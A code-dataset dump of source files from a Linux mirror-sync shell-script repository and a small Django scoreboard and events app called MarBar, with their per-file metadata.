then\n OLD=0\n fi\n NOW=`date +%s`\n let P=NOW-OLD\n if [ \"$P\" -lt \"86400\" ]; then\n kvdb_local_get last_du_value\n else\n NSIZE=`du \"$MIRRORROOT/$__REPO/\" -sh | awk '{ print $1; }'`\n kvdb_local_set last_du_value \"$NSIZE\"\n kvdb_local_set last_du_time \"$NOW\"\n echo \"$NSIZE\"\n fi\n}\n" }, { "alpha_fraction": 0.7151898741722107, "alphanum_fraction": 0.7658227682113647, "avg_line_length": 16.44444465637207, "blob_id": "d70358c6b7557856f6ba177fee0e1d4a4eef0abd", "content_id": "90aebb373273cad172bb586cc212bcb462703890", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 158, "license_type": "no_license", "max_line_length": 44, "num_lines": 9, "path": "/syncbin/cygwin", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=cygwin\n_UPSTREAM=rsync://sourceware.org/cygwin-ftp/\n_SYNCEVERY=7200\n_FAILRETRY=600\n_FAILRETRIES=4\n\n" }, { "alpha_fraction": 0.7055084705352783, "alphanum_fraction": 0.7224576473236084, "avg_line_length": 
25.22222137451172, "blob_id": "cf45f5e6010223faec70d2a475b53c5e49628e7e", "content_id": "cfade390ae20e31f1f680b74bf84168b47e2ef08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 472, "license_type": "no_license", "max_line_length": 168, "num_lines": 18, "path": "/syncbin/cm", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=cm\n_UPSTREAM=rsync://download.cyanogenmod.org/mirror/\n_SYNCEVERY=9600\n_FAILRETRY=900\n_FAILRETRIES=4\n_RSYNC_ARGS=\"$_RSYNC_ARGS --exclude index.html --exclude all.html\"\n\n_post_sync() {\n $SCRIPTROOT/cm_dir_index\n}\n\n_upstream_inconsistent() {\n curl -s \"http://jenkins.cyanogenmod.org/job/android/lastBuild/api/json?tree=building\" | python -c 'import sys,json; exit(int(not json.load(sys.stdin)[\"building\"]))'\n}\n" }, { "alpha_fraction": 0.741134762763977, "alphanum_fraction": 0.7730496525764465, "avg_line_length": 27.200000762939453, "blob_id": "1322b74f4275e8a6cc7b0346bc949bad73e75596", "content_id": "34b18e9b24983fee6634bcc7076b865f354aa5d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 282, "license_type": "no_license", "max_line_length": 92, "num_lines": 10, "path": "/syncbin/opensuse", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=opensuse\n_UPSTREAM=rsync://rsync.opensuse.org/opensuse-full-with-factory/opensuse/\n_SYNCEVERY=14400\n_FAILRETRY=600\n_FAILRETRIES=4\n_RSYNC_ARGS=\"$_RSYNC_ARGS --exclude .timestamp_invisible --exclude ports/ --delete-excluded\"\n" }, { "alpha_fraction": 0.7245509028434753, "alphanum_fraction": 0.7784430980682373, "avg_line_length": 17.44444465637207, "blob_id": "4bb4aa71adec4de1b0eec85a5e04098839e2e76f", "content_id": "369d8ea88b3575f7ce6710bb2e57ffeb9c5ed0f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 167, "license_type": "no_license", "max_line_length": 52, "num_lines": 9, "path": "/syncbin/deepin", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=deepin\n_UPSTREAM=rsync://packages.linuxdeepin.com/packages/\n_SYNCEVERY=28800\n_FAILRETRY=600\n_FAILRETRIES=4\n\n" }, { "alpha_fraction": 0.6868420839309692, "alphanum_fraction": 0.7078947424888611, "avg_line_length": 21.352941513061523, "blob_id": "17b65e7903d14da0a23d1ed1785f55a64363ee46", "content_id": "0306a2b16120a93b1b9707a3a484b228eccc3333", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 380, "license_type": "no_license", "max_line_length": 62, "num_lines": 17, "path": "/syncbin/fedora", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=fedora\n_UPSTREAM=rsync://dl.fedoraproject.org/fedora-enchilada/linux/\n_SYNCEVERY=1800\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/../fullfilelist=/fullfilelist\"\n\n_post_sync () {\n cd $MIRRORROOT/$_REPO\n rsync \"${_UPSTREAM}../fullfilelist\" .\n $SCRIPTROOT/report_mirror -c \"$SCRIPTROOT/fedora.conf\"\n cd -\n}\n" }, { "alpha_fraction": 0.7307692170143127, "alphanum_fraction": 0.7644230723381042, "avg_line_length": 19.799999237060547, "blob_id": "fb198aef60ff71228aee798dbacb1133c36d2952", "content_id": 
"fee921b39808dc6f1b0f2e497782bec7c4ffbad9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 208, "license_type": "no_license", "max_line_length": 45, "num_lines": 10, "path": "/syncbin/gentoo-portage", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=gentoo-portage\n_UPSTREAM=rsync://rsync.us.gentoo.org/$_REPO/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/metadata/timestamp.chk\"\n" }, { "alpha_fraction": 0.7226027250289917, "alphanum_fraction": 0.7534246444702148, "avg_line_length": 28.200000762939453, "blob_id": "378239c6d00b50b367a738e14dd04ada4a1cf2b3", "content_id": "f6ba0fd7df78f00f8835477edc4b09115419dce0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 292, "license_type": "no_license", "max_line_length": 134, "num_lines": 10, "path": "/syncbin/qt", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=qt\n_UPSTREAM=rsync://master.qt-project.org/qt-all/\n_SYNCEVERY=43200\n_FAILRETRY=600\n_FAILRETRIES=4\n_RSYNC_ARGS=\"$_RSYNC_ARGS --delete-excluded --exclude=archive/ --exclude=snapshots/ --exclude=community-releases/ --exclude=ministro/\"\n" }, { "alpha_fraction": 0.7422680258750916, "alphanum_fraction": 0.7783505320549011, "avg_line_length": 18.399999618530273, "blob_id": "7d8f87e3db423a016dde411180ec1a45d1d9737f", "content_id": "9bae7dcf96f0e8a4ce31822028d96200b1919997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 194, "license_type": "no_license", "max_line_length": 48, "num_lines": 10, "path": "/syncbin/archlinux", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=archlinux\n_UPSTREAM=rsync://mirror.leaseweb.net/archlinux/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/lastupdate\"\n" }, { "alpha_fraction": 0.5660579800605774, "alphanum_fraction": 0.5993555188179016, "avg_line_length": 23.5, "blob_id": "10e8ec83d5851fdf2deb49ea2265e4bf05053c65", "content_id": "b4a266ee6f22f11ae77ac62794ae2593d8e1995f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 931, "license_type": "no_license", "max_line_length": 163, "num_lines": 38, "path": "/syncbin/remi", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=remi\n_SUBREPO1=enterprise\n_SUBREPO2=fedora\n_UPSTREAM=rsync://remi.famillecollet.com\n_SYNCEVERY=28800\n_FAILRETRY=600\n_FAILRETRIES=4\n_RSYNC_ARGS=\"$_RSYNC_ARGS -4\"\n\n_sync () {\n mkdir -p $MIRRORROOT/$_REPO\n cd $MIRRORROOT/$_REPO\n if [[ $? 
!= 0 ]]; then\n return 1\n fi\n mkdir -p $_SUBREPO1 $_SUBREPO2\n wget http://rpms.famillecollet.com/index.html -O index.html\n rsync $_UPSTREAM/$_SUBREPO1/ $_SUBREPO1/ $_RSYNC_ARGS\n RETVAL1=$?\n rsync $_UPSTREAM/$_SUBREPO2/ $_SUBREPO2/ $_RSYNC_ARGS\n RETVAL2=$?\n RETVAL=0\n if [[ $RETVAL1 != 0 ]]; then\n RETVAL=$RETVAL1;\n fi\n if [[ $RETVAL2 != 0 ]]; then\n RETVAL=$RETVAL2;\n fi\n cd $OWD\n return $RETVAL\n}\n\n_get_size () {\n cat $LOGROOT/$_REPO/log.stdout | sed -n \"s/total size is \\(.*\\)[TKMG].*/\\1/ p\" | python -c 'a=raw_input();b=raw_input(); print \"%0.2lfG\" % (float(a)+float(b))'\n}\n" }, { "alpha_fraction": 0.6970954537391663, "alphanum_fraction": 0.7344398498535156, "avg_line_length": 17.538461685180664, "blob_id": "446a68052b066cd4a53de5901975b2db04faa6e2", "content_id": "48edf01625a6248ebef0a270f8e6aaa3a639d214", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 241, "license_type": "no_license", "max_line_length": 58, "num_lines": 13, "path": "/syncbin/epel", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=epel\n_UPSTREAM=rsync://dl.fedoraproject.org/fedora-epel/\n_SYNCEVERY=28800\n_FAILRETRY=600\n_FAILRETRIES=4\n\n_post_sync () {\n $SCRIPTROOT/report_mirror -c \"$SCRIPTROOT/fedora.conf\"\n}\n" }, { "alpha_fraction": 0.7176470756530762, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 17.77777862548828, "blob_id": "0852b6ccd75b58b6b6c0b315d2b3766f5d407f2f", "content_id": "6df4f88d942e135c2d49ca2b06b2d78c820e3b2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 170, "license_type": "no_license", "max_line_length": 50, "num_lines": 9, "path": "/syncbin/linuxmint-cd", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=linuxmint-cd\n_UPSTREAM=rsync://ftp.heanet.ie/pub/linuxmint.com/\n_SYNCEVERY=7200\n_FAILRETRY=600\n_FAILRETRIES=4\n\n" }, { "alpha_fraction": 0.7168674468994141, "alphanum_fraction": 0.7771084308624268, "avg_line_length": 17.44444465637207, "blob_id": "41894cc437ad18b07c8a27586b959c6dfe798a22", "content_id": "984655ffb94979e7923d3ce2ad03aa2dd40ab0a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 166, "license_type": "no_license", "max_line_length": 44, "num_lines": 9, "path": "/syncbin/backtrack-iso", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=backtrack-iso\n_UPSTREAM=rsync://mirrors.rit.edu/backtrack/\n_SYNCEVERY=432000\n_FAILRETRY=600\n_FAILRETRIES=4\n" }, { "alpha_fraction": 0.7095237970352173, "alphanum_fraction": 0.761904776096344, "avg_line_length": 20, "blob_id": "981db574788b87daf2ca12737b30ad2b8aff041d", "content_id": "6859763bbe2e1496afc923091a4772a93bf88f29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 210, "license_type": "no_license", "max_line_length": 46, "num_lines": 10, "path": "/syncbin/kali-images", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=kali-images\n_UPSTREAM=rsync://kali.mirror.garr.it/$_REPO/\n_SYNCEVERY=3600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/kali-latest/amd64/SHA1SUMS\"\n" }, { "alpha_fraction": 
0.7288135886192322, "alphanum_fraction": 0.7796609997749329, "avg_line_length": 18.55555534362793, "blob_id": "b8ee9408ae619cb3ba4cc2e8de3f9e948072ef12", "content_id": "25fe290c9feeeff6e8dbcbbac03ef07da937b812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 177, "license_type": "no_license", "max_line_length": 53, "num_lines": 9, "path": "/syncbin/ubuntu-releases", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=ubuntu-releases\n_UPSTREAM=rsync://rsync.releases.ubuntu.com/releases/\n_SYNCEVERY=43200\n_FAILRETRY=600\n_FAILRETRIES=4\n\n" }, { "alpha_fraction": 0.7237569093704224, "alphanum_fraction": 0.7624309659004211, "avg_line_length": 17.100000381469727, "blob_id": "d0f83b7c46425df4d037db329657cc58e10224b3", "content_id": "34b9788ccfa9ec8d240e292996e330783c16f7b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 181, "license_type": "no_license", "max_line_length": 43, "num_lines": 10, "path": "/syncbin/eclipse", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=eclipse\n_UPSTREAM=rsync://rsync.osuosl.org/eclipse/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/TIME\"\n" } ]
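One shared contract ties the syncbin scripts above together: every run of sync_core ends by writing a per-mirror status file at $STATUSROOT/<name>.json whose upstream, size, status, lastsync, nextsync and name keys come from the GenJSON helper, and sync_daemon re-reads nextsync from that same file to schedule the next run. Below is a minimal, hedged sketch of a consumer reading one of these files; the concrete file name archlinux.json is only an assumed example, and the fall-back-to--1 default mirrors the inline one-liners already used in sync_daemon.

import json

# Read one per-mirror status file written by sync_core. The directory
# matches STATUSROOT as exported in sync_daemon; the mirror name
# 'archlinux' is an assumed example, not the only valid value.
with open('/home/mirror/mirrorweb/status/archlinux.json') as f:
    status = json.load(f)

# Same defaulting convention as sync_daemon's inline one-liners:
# a missing key falls back to -1.
nextsync = status.get('nextsync', -1)
print('%s %s %s' % (status.get('name'), status.get('status'), nextsync))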
38
fumpen/marbar
https://github.com/fumpen/marbar
b5df075d4267c6442d01cca6f7ab7372ef29cbcc
64c26479564be1599575ccffaa741da66c866deb
f501e36ff498098904cffdb499990fc86ff1b4fe
refs/heads/master
2020-04-20T01:58:02.005773
2019-02-19T14:46:16
2019-02-19T14:46:16
168,559,539
0
0
null
null
null
null
null
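The row below (fumpen/marbar) is a small Django score-keeping site, and one relationship carries almost all of its views: a single MarBar row is flagged is_active=True, and ScoreUnit rows attach to it through a ForeignKey, with the placement field choosing the scoreboard column. A minimal sketch of that central query follows, assuming a configured Django project containing the management and score_board apps defined in the files of this record; the print formatting is illustrative only.

from management.models import MarBar
from score_board.models import ScoreUnit

# Fetch the single active MarBar; .get() raises if no row or more than
# one row is flagged active, which the views treat as an error case.
active = MarBar.objects.get(is_active=True)

# ScoreUnit rows reference the active MarBar via a ForeignKey; the
# views order by title and split columns on placement (0-4).
for unit in ScoreUnit.objects.filter(marbar=active).order_by('title'):
    print('%s: %d points (column %d)' % (unit.title, unit.points, unit.placement))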
[ { "alpha_fraction": 0.5589680671691895, "alphanum_fraction": 0.5884521007537842, "avg_line_length": 30.30769157409668, "blob_id": "2faab9734f1a79aaded94b823f9055ea11cc9185", "content_id": "2cda678b130a08e4cdc3cffc76ddd71ed9b3387e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 814, "license_type": "no_license", "max_line_length": 115, "num_lines": 26, "path": "/marbar/score_board/migrations/0001_initial.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.1 on 2018-10-26 15:02\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('management', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ScoreUnit',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(default='', max_length=200)),\n ('points', models.IntegerField(default=0)),\n ('placement', models.IntegerField(default=0)),\n ('marbar', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='management.MarBar')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.6750348806381226, "alphanum_fraction": 0.6750348806381226, "avg_line_length": 43.75, "blob_id": "9aab15911de2ea01af9d8250e8592e6adf292e13", "content_id": "f896e7890ae8eb7b5b358cd0a5c397c39c56a8ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 717, "license_type": "no_license", "max_line_length": 76, "num_lines": 16, "path": "/marbar/management/urls.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('', views.general_management, name='management_view'),\n path('login/', views.crude_login_view, name='login_view'),\n path('login_post/', views.crude_login, name='login'),\n path('logout/', views.logout_user, name='logout'),\n path('create_marbar/', views.create_marbar, name='create_marbar'),\n path('create_user/', views.create_user, name='create_user'),\n path('update_marbar/', views.update_marbar, name='update_marbar'),\n path('activate_marbar/', views.activate_marbar, name='activate_marbar'),\n path('events/', views.events_view, name='events'),\n path('delete_event/', views.delete_event, name='delete_event'),\n]\n\n" }, { "alpha_fraction": 0.5163496732711792, "alphanum_fraction": 0.5336610674858093, "avg_line_length": 45.32673263549805, "blob_id": "76863951e36e901b5aa467bb30bdce55df1652b9", "content_id": "900bf37f5b07e3f24e5c46d0fee3dae41c3a6ab0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4679, "license_type": "no_license", "max_line_length": 118, "num_lines": 101, "path": "/marbar/management/forms.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django import forms\nfrom django.contrib.auth.models import User\nfrom management.models import MarBar, Event\nfrom score_board.models import ScoreUnit\nfrom django.db import transaction\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib import messages\n\n\nSTD_FORM = [('1A', 1), ('2A', 1), ('3A', 1), ('4A', 1), ('5A', 1), ('6A', 1), ('7A', 1),\n ('1B', 2), ('2B', 2), ('3B', 2), ('4B', 2), ('5B', 2), ('6B', 2), ('7B', 2),\n ('1C', 3), ('2C', 3), ('3C', 3), ('4C', 3), ('5C', 3), ('6C', 3), ('7C', 3),\n ('1D', 4), ('2D', 4), ('3D', 4), ('4D', 4), ('5D', 4), ('6D', 4), ('7D', 4),\n ('Aspirants', 0), ('Crew', 0), ('MarBar Committee', 0)]\n\n\nclass NewUser(forms.Form):\n title = forms.CharField(max_length=100)\n mail = forms.CharField(max_length=100)\n password1 = forms.CharField(max_length=100)\n password2 = forms.CharField(max_length=100)\n\n def clean(self):\n cleaned_data = super().clean()\n pass1 = cleaned_data.get('password1')\n pass2 = cleaned_data.get('password2')\n if pass1 == pass2:\n return cleaned_data\n else:\n raise forms.ValidationError('The provided passwords must be the same')\n\n\nclass MarBarForm(forms.Form):\n title = forms.CharField()\n #banner = forms.ImageField(required=False)\n users = forms.ModelMultipleChoiceField(queryset=None, to_field_name='username',\n widget=forms.CheckboxSelectMultiple, required=False)\n end_date = forms.DateTimeField(widget=forms.DateTimeInput, input_formats=['%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M',\n '%m/%d/%Y %H:%M:%S', '%m/%d/%Y %H:%M'])\n create_standard_fields = forms.BooleanField(required=False)\n\n intended_pk = forms.IntegerField(widget=forms.HiddenInput, required=False)\n\n class Meta:\n model = MarBar\n fields = ['title', 'end_date', 'is_active', 'create_standard_fields']\n\n def __init__(self, *args, **kwargs):\n user_choices = User.objects.all().exclude(is_superuser=True)\n super().__init__(*args, **kwargs)\n self.fields['users'].queryset = user_choices\n\n def save(self, new_instance=False, update_instance=False):\n if self.is_valid() & new_instance:\n with transaction.atomic():\n new_marbar = MarBar.objects.create(title=self.cleaned_data['title'],\n end_date=self.cleaned_data['end_date'], is_active=False)\n for u in self.cleaned_data['users']:\n new_marbar.users.add(u)\n new_marbar.save()\n\n if 
self.cleaned_data['create_standard_fields']:\n for n, p in STD_FORM:\n ScoreUnit.objects.create(title=n, points=0, placement=p, marbar=new_marbar)\n\n if self.is_valid() & update_instance:\n marbar_update = MarBar.objects.get(pk=self.cleaned_data['intended_pk'])\n with transaction.atomic():\n marbar_update.title = self.cleaned_data['title']\n marbar_update.end_date = self.cleaned_data['end_date']\n marbar_update.users.clear()\n for u in self.cleaned_data['users']:\n marbar_update.users.add(u)\n marbar_update.save()\n\n if self.cleaned_data['create_standard_fields']:\n for n, p in STD_FORM:\n ScoreUnit.objects.create(title=n, points=0, placement=p, marbar=marbar_update)\n\n\n\n\nclass EventForm(forms.Form):\n title = forms.CharField()\n info = forms.CharField(required=False)\n start_date = forms.DateTimeField(widget=forms.DateTimeInput, input_formats=['%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M',\n '%m/%d/%Y %H:%M:%S', '%m/%d/%Y %H:%M'])\n\n end_date = forms.DateTimeField(widget=forms.DateTimeInput, input_formats=['%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M',\n '%m/%d/%Y %H:%M:%S', '%m/%d/%Y %H:%M'])\n class Meta:\n model = MarBar\n fields = ['title', 'info', 'start_date', 'end_date']\n\n def save(self, active_marbar):\n if self.is_valid():\n with transaction.atomic():\n new_event = Event(marbar=active_marbar, title=self.cleaned_data['title'],\n info=self.cleaned_data['info'], start_date=self.cleaned_data['start_date'],\n end_date=self.cleaned_data['end_date'])\n new_event.save()\n" }, { "alpha_fraction": 0.5214495658874512, "alphanum_fraction": 0.5275220274925232, "avg_line_length": 45.40909194946289, "blob_id": "c54ed71abcdf892d267b8f7480e918a6c80d67de", "content_id": "ff33f8ca4a6e9cfd7f9fdf7b03dfad3d1dc410c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5105, "license_type": "no_license", "max_line_length": 122, "num_lines": 110, "path": "/marbar/score_board/views.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.urls import reverse\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom .models import ScoreUnit\nfrom management.models import MarBar\nfrom django.http import JsonResponse\nimport json\nfrom django.contrib import messages\n\n\ndef help_order(d):\n xs = []\n for x in d:\n xs.append(x)\n return xs\n\ndef help_order_v2(d):\n xs = []\n for x in d:\n xs.append({'title': x.title, 'points': x.points})\n return xs\n\n\ndef score_board(request):\n try:\n active_marbar = MarBar.objects.get(is_active=True)\n all_data = ScoreUnit.objects.filter(marbar__pk=active_marbar.pk).order_by('title')\n return render(request, 'score_board.html',\n {'collum_0': help_order(all_data.filter(placement=0)),\n 'collum_1': help_order(all_data.filter(placement=1)),\n 'collum_2': help_order(all_data.filter(placement=2)),\n 'collum_3': help_order(all_data.filter(placement=3)),\n 'collum_4': help_order(all_data.filter(placement=4)),\n 'countdown_date': active_marbar.end_date})\n except:\n return render(request, 'score_board.html', {})\n\n\ndef get_points(request):\n active_marbar = MarBar.objects.get(is_active=True)\n all_data = ScoreUnit.objects.filter(marbar__pk=active_marbar.pk).order_by('title')\n return JsonResponse(help_order_v2(all_data), safe=False)\n\n\ndef get_graph(request):\n active_marbar = MarBar.objects.get(is_active=True)\n D = ScoreUnit.objects.filter(marbar__pk=active_marbar.pk).order_by('title')\n points = []\n labels = []\n for d in D:\n points.append(d.points)\n labels.append(d.title)\n fin = [a for 
a in zip(labels, points)]\n #return JsonResponse({'points': json.dumps(points), 'graph_labels': json.dumps(labels)}, safe=False)\n return JsonResponse({'points': json.dumps(fin)}, safe=False)\n\n\ndef assign_points(request):\n active_bar = MarBar.objects.filter(is_active=True)\n if active_bar.exists():\n active_bar = MarBar.objects.get(is_active=True)\n if request.user.is_authenticated and (request.user in active_bar.users.all() or request.user.is_superuser):\n if request.method == 'GET':\n all_data = ScoreUnit.objects.filter(marbar__pk=active_bar.pk).order_by('title')\n return render(request, 'assign_points.html',\n {'collum_0': all_data.filter(placement=0),\n 'collum_1': all_data.filter(placement=1),\n 'collum_2': all_data.filter(placement=2),\n 'collum_3': all_data.filter(placement=3),\n 'collum_4': all_data.filter(placement=4)})\n elif request.method == 'POST':\n try:\n su = ScoreUnit.objects.get(pk=int(request.POST.get('scoreUnitPk')))\n new_val = request.POST.get('scoreUnitValue')\n if new_val:\n if new_val[0] == '-':\n front_opr = -1\n new_val = new_val[1:]\n elif new_val[0] == '+':\n front_opr = 1\n new_val = new_val[1:]\n else:\n front_opr = 1\n if str.isdigit(new_val):\n new_score = su.points + (front_opr * int(new_val))\n if new_score < 0:\n new_score = 0\n su.points = new_score\n su.save()\n else:\n messages.add_message(request, messages.ERROR,\n 'The points field was not correctly filled and the points was not added')\n return redirect(reverse('score_board:assign_points'))\n else:\n messages.add_message(request, messages.ERROR,\n 'The points field was not correctly filled and the points was not added')\n return redirect(reverse('score_board:assign_points'))\n\n return redirect(reverse('score_board:assign_points'))\n except:\n messages.add_message(request, messages.ERROR, 'An error occurred and the points was not added')\n return redirect(reverse('score_board:assign_points'))\n else:\n return redirect(reverse('score_board'))\n else:\n messages.add_message(request, messages.ERROR,\n 'You must be logged in and connected to the Active MarBar to access this')\n return redirect(reverse('score_board'))\n else:\n messages.add_message(request, messages.ERROR, 'There is no active MarBar at this time')\n return redirect(reverse('score_board'))\n" }, { "alpha_fraction": 0.7020033597946167, "alphanum_fraction": 0.7153589129447937, "avg_line_length": 45.07692337036133, "blob_id": "5a75d0f6663b608d64bcf55f5bf1a27af447cace", "content_id": "1baac8498c5a392d55098e128ccffe5adc0f7ad6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1198, "license_type": "no_license", "max_line_length": 158, "num_lines": 26, "path": "/marbar/marbar/urls.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "\"\"\"marbar URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom score_board.views import score_board\n# from django.contrib.auth import views as auth_views #https://simpleisbetterthancomplex.com/tutorial/2016/06/27/how-to-use-djangos-built-in-login-system.html\n\nurlpatterns = [\n path('', score_board, name='score_board'),\n path(r'admin/', admin.site.urls),\n path(r'management/', include(('management.urls', 'management'), namespace='management')),\n path(r'score_board/', include(('score_board.urls', 'score_board'), namespace='score_board')),\n]\n" }, { "alpha_fraction": 0.554760217666626, "alphanum_fraction": 0.5583392977714539, "avg_line_length": 32.28571319580078, "blob_id": "7e02efb780daa3cce4654cd9ab0ff7e4b2547c64", "content_id": "df896bac628084f3762d74a598ec47867b31315b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1397, "license_type": "no_license", "max_line_length": 96, "num_lines": 42, "path": "/marbar/score_board/templates/base.html", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "<!DOCTYPE html>\n<html lang=\"en\">\n{% load static %}\n<head>\n <meta charset=\"UTF-8\">\n <title>{% block title %}RHK MarBar{% endblock %}</title>\n <script type=\"text/javascript\" src=\"{% static \"jquery.js\" %}\"></script>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"{% static \"base_style.css\" %}\" />\n {% block headers %}\n {% endblock %}\n</head>\n<body>\n{% if messages %}\n <ul id=\"message_box\">\n {% for message in messages %}\n <li {% if message.tags %} class=\"{{ message.tags }}\"{% endif %}>{{ message }}</li>\n {% endfor %}\n </ul>\n <script>\n setTimeout(function() {\n $(\"#message_box\").fadeOut().empty();\n }, 2500);\n </script>\n{% endif %}\n <ul id=\"nav_bar\">\n <li class=\"nav_bar_elem\"><a href={% url \"score_board\" %}>Score board</a></li>\n <li class=\"nav_bar_elem\"><a href={% url \"management:events\" %}>Events</a></li>\n {% if user.is_authenticated %}\n <li class=\"nav_bar_elem\"><a href={% url \"management:management_view\" %}>Management</a></li>\n <li class=\"nav_bar_elem\"><a href={% url \"score_board:assign_points\" %}>Add Points</a></li>\n <li class=\"nav_bar_elem\"><a href={% url \"management:logout\" %}>Log out</a></li>\n {% else %}\n <li class=\"nav_bar_elem\"><a href={% url \"management:login_view\" %}>Log in</a></li>\n {% endif %}\n\n</ul>\n<div id=\"main_content\">\n{% block content %}{% endblock %}\n</div>\n\n</body>\n</html>" }, { "alpha_fraction": 0.5524079203605652, "alphanum_fraction": 0.5694050788879395, "avg_line_length": 37.16216278076172, "blob_id": "b2a1d57058e6d60f7b4cbf77f289e825c3c36904", "content_id": 